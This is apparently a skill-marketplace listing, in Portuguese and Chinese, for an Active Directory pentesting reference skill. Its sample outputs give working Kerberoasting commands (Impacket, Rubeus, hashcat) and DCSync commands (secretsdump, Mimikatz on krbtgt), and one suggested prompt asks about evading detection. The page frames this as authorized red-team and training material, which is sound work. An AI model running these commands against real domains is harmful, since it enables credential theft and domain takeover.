active-directory-attacks
Executar testes de penetração e avaliações de red team do Active Directory
Equipes de segurança precisam de material de referência abrangente para avaliações autorizadas do Active Directory. Esta habilidade fornece técnicas de ataque documentadas e comandos de ferramentas para pentesters conduzindo operações de red team.
下载技能 ZIP
在 Claude 中上传
前往 设置 → 功能 → 技能 → 上传技能
开启并开始使用
测试它
正在使用“active-directory-attacks”。 Mostre-me comandos de Kerberoasting para o domínio example.local
预期结果:
- Usando Impacket do Linux: GetUserSPNs.py example.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
- Usando Rubeus do Windows: .\Rubeus.exe kerberoast /outfile:hashes.txt
- Quebrando com hashcat: hashcat -m 13100 hashes.txt rockyou.txt
正在使用“active-directory-attacks”。 Como realizo um ataque DCSync?
预期结果:
- DCSync requer direitos de Replicating Directory Changes. Usando Impacket: secretsdump.py example.local/admin:password@10.10.10.10 -just-dc
- Usando Mimikatz: lsadump::dcsync /domain:example.local /user:krbtgt
- Isso extrai todos os hashes de senha do domínio incluindo krbtgt para criação de Golden Ticket
安全审计
低风险This skill contains documentation and reference material for Active Directory penetration testing techniques. Static analysis flagged 200+ patterns (PowerShell commands, tool references, IP addresses) but all are FALSE POSITIVES - the files are markdown documentation, not executable code. Content describes legitimate security tools (BloodHound, Impacket, Mimikatz) used by penetration testers. Risk is LOW because: (1) files are read-only reference material, (2) no code execution occurs, (3) content is educational for authorized security testing. Recommend adding disclaimer about authorized use only.
高风险问题 (2)
中风险问题 (2)
低风险问题 (2)
风险因素
检测到的模式
质量评分
你能构建什么
Planejamento de Avaliação Red Team
Consultores de segurança se preparando para avaliações autorizadas de AD usam esta habilidade para planejar caminhos de ataque e selecionar ferramentas apropriadas para o escopo do engajamento.
Pesquisa de Defesa Blue Team
Equipes de segurança defensiva estudam técnicas de ataque para entender TTPs de adversários e melhorar regras de detecção para suas plataformas SIEM e EDR.
Treinamento e Educação em Segurança
Instrutores usam técnicas documentadas para ensinar estudantes sobre vulnerabilidades do AD e estratégias adequadas de remediação em ambientes de laboratório controlados.
试试这些提示
Preciso realizar reconhecimento autorizado do Active Directory. Quais comandos do BloodHound devo usar para enumerar usuários, grupos e computadores do domínio? O domínio alvo é example.local com credenciais user:password.
Mostre-me como realizar Kerberoasting contra um domínio do Active Directory. Inclua comandos para extrair tickets TGS com Impacket e quebrá-los com hashcat.
Comprometi um usuário de domínio de baixo privilégio. Quais são as técnicas recomendadas de movimento lateral para escalar privilégios? Compare pass-the-hash, overpass-the-hash e ataques de delegação.
Explique como alcançar dominação de domínio usando ataques DCSync e Golden Ticket. Inclua os pré-requisitos, comandos e considerações de evitando detecção para cada técnica.
最佳实践
- Sempre obtenha autorização por escrito antes de executar qualquer técnica de ataque AD contra ambientes de produção
- Documente todas as contas comprometidas e sistemas acessados para relatórios ao cliente e orientação de remediação
- Sincronize o tempo com o controlador de domínio antes de ataques Kerberos para evitar falhas de clock skew
- Use técnicas furtivas como limites de enumeração de usuários para evitar bloqueios de conta durante password spraying
- Restaure qualquer estado modificado do sistema (como alterações de senha ZeroLogon) após conclusão dos testes
避免
- Nunca execute comandos de ataque contra ambientes sem autorização explícita por escrito do proprietário
- Não execute password spraying agressivo que possa bloquear contas de usuários legítimos
- Evite deixar Golden Tickets ou outros mecanismos de persistência sem documentá-los para remoção
- Não modifique objetos do Active Directory, GPOs ou configurações de produção sem aprovação